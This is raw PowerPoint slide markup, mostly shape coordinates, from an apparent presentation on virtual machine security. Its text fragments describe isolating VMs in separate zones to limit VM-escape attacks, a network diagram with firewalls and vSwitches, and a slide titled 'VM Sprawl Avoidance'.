            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection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36691" y="760476"/>
            <a:ext cx="5254752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48125" y="1933193"/>
            <a:ext cx="815467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This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configuration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reduces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impact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VM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escaping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attack.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55135" y="7434071"/>
            <a:ext cx="8818245" cy="802005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8818245" h="802004">
                <a:moveTo>
                  <a:pt x="8684260" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="133603" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91374" y="6811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54699" y="25777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25777" y="54699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6811" y="91374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="133603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="668019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6811" y="710249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25777" y="746924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54699" y="775846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91374" y="794812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133603" y="801623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8684260" y="801623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8726489" y="794812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8763164" y="775846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8792086" y="746924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8811052" y="710249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8817864" y="668019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8817864" y="133603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8811052" y="91374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8792086" y="54699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8763164" y="25777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8726489" y="6811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8684260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633976" y="7640218"/>
            <a:ext cx="705993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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Isolating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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VMs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different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>zones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separate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>hardware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076955" y="2915666"/>
            <a:ext cx="10354310" cy="3390900"/>
            <a:chOff x="3076955" y="2915666"/>
            <a:chExt cx="10354310" cy="33909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76955" y="4981955"/>
              <a:ext cx="885444" cy="8854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03063" y="4945380"/>
              <a:ext cx="957072" cy="9585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963161" y="5442966"/>
              <a:ext cx="739775" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="739775" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="739393" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE8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00800" y="4981955"/>
              <a:ext cx="957072" cy="95707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660898" y="5442966"/>
              <a:ext cx="739775" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="739775" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="739393" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE8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7011" y="4981955"/>
              <a:ext cx="958596" cy="95707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358634" y="5442966"/>
              <a:ext cx="739775" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="739775" h="635">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="739394" y="381"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE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26751" y="4981955"/>
              <a:ext cx="848868" cy="95707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056370" y="5442966"/>
              <a:ext cx="727075" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="727075" h="635">
                  <a:moveTo>
                    <a:pt x="0" y="381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726694" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE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449049" y="4629150"/>
              <a:ext cx="1969135" cy="1664335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1969134" h="1664335">
                  <a:moveTo>
                    <a:pt x="0" y="277367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4469" y="227517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17355" y="180595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37874" y="137385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65241" y="98673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98673" y="65241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137385" y="37874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180595" y="17355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227517" y="4469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277368" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691640" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741490" y="4469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788412" y="17355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831622" y="37874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870334" y="65241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903766" y="98673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931133" y="137385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951652" y="180595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964538" y="227517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969007" y="277367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969007" y="1386839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964538" y="1436690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951652" y="1483612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931133" y="1526822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903766" y="1565534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870334" y="1598966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831622" y="1626333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788412" y="1646852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741490" y="1659738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691640" y="1664208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277368" y="1664208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227517" y="1659738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180595" y="1646852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137385" y="1626333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98673" y="1598966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65241" y="1565534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37874" y="1526822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17355" y="1483612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4469" y="1436690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1386839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="277367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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03379" y="4808220"/>
              <a:ext cx="998220" cy="55930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35155" y="5548883"/>
              <a:ext cx="998220" cy="55930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21539" y="5166360"/>
              <a:ext cx="996696" cy="55930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0709910" y="5442966"/>
              <a:ext cx="727075" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="727075" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726694" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE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022085" y="2928366"/>
              <a:ext cx="1856739" cy="2004060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1856740" h="2004060">
                  <a:moveTo>
                    <a:pt x="0" y="309372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3355" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="309372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="1694688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="1740394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="1784021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="1825091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="1863123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="1897639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="1928160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="1954206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="1975298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="1990957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="2000704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="2004060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="2004060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="2000704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="1990957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="1975298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="1954206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="1928160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="1897639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="1863123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="1825091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="1784021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="1740394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1694688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="309372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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70676" y="3364992"/>
              <a:ext cx="850392" cy="74371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77811" y="3364992"/>
              <a:ext cx="850392" cy="74371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61532" y="4187952"/>
              <a:ext cx="809243" cy="707136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6466713" y="3096895"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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121143" y="3109087"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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087361" y="4417821"/>
            <a:ext cx="65468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>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Switch</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode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9218930" y="2943098"/>
            <a:ext cx="1882139" cy="2028189"/>
            <a:chOff x="9218930" y="2943098"/>
            <a:chExt cx="1882139" cy="2028189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9231630" y="2955798"/>
              <a:ext cx="1856739" cy="2002789"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1856740" h="2002789">
                  <a:moveTo>
                    <a:pt x="0" y="309372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3355" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856231" y="309372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856231" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="309372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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80220" y="3390900"/>
              <a:ext cx="850392" cy="74371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88880" y="3390900"/>
              <a:ext cx="848868" cy="74371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71076" y="4213860"/>
              <a:ext cx="809244" cy="707136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9676892" y="3123438"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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331322" y="3134944"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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297414" y="4444110"/>
            <a:ext cx="65468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>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Switch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020948" y="6078728"/>
            <a:ext cx="78549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5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t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804664" y="6145529"/>
            <a:ext cx="7512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30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Firewall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498082" y="6141211"/>
            <a:ext cx="94424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25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-60">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t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219947" y="6128130"/>
            <a:ext cx="7512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30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Firewall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233154" y="6029959"/>
            <a:ext cx="202628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29920" marR="5080" indent="-617855">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Middleware/Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-495">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Services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1830050" y="6514592"/>
            <a:ext cx="41211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40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>LAN</a:t>
            </a:r>
            <a:endParaRPr sz="1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14364" y="306451"/>
            <a:ext cx="382651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310">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sprawl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoidance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4688" y="760476"/>
            <a:ext cx="5292852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244346" y="3487673"/>
            <a:ext cx="6160135" cy="4295140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="4295140">
                <a:moveTo>
                  <a:pt x="0" y="715772"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1651" y="666761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6533" y="618637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14540" y="571507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25565" y="525477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39501" y="480653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56243" y="437143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75683" y="395053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97714" y="354489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122231" y="315559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149127" y="278367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178295" y="243022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209629" y="209629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243022" y="178295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278367" y="149127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315559" y="122231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354489" y="97714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395053" y="75683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437143" y="56243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480653" y="39501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525477" y="25565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571507" y="14540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618637" y="6533"/>
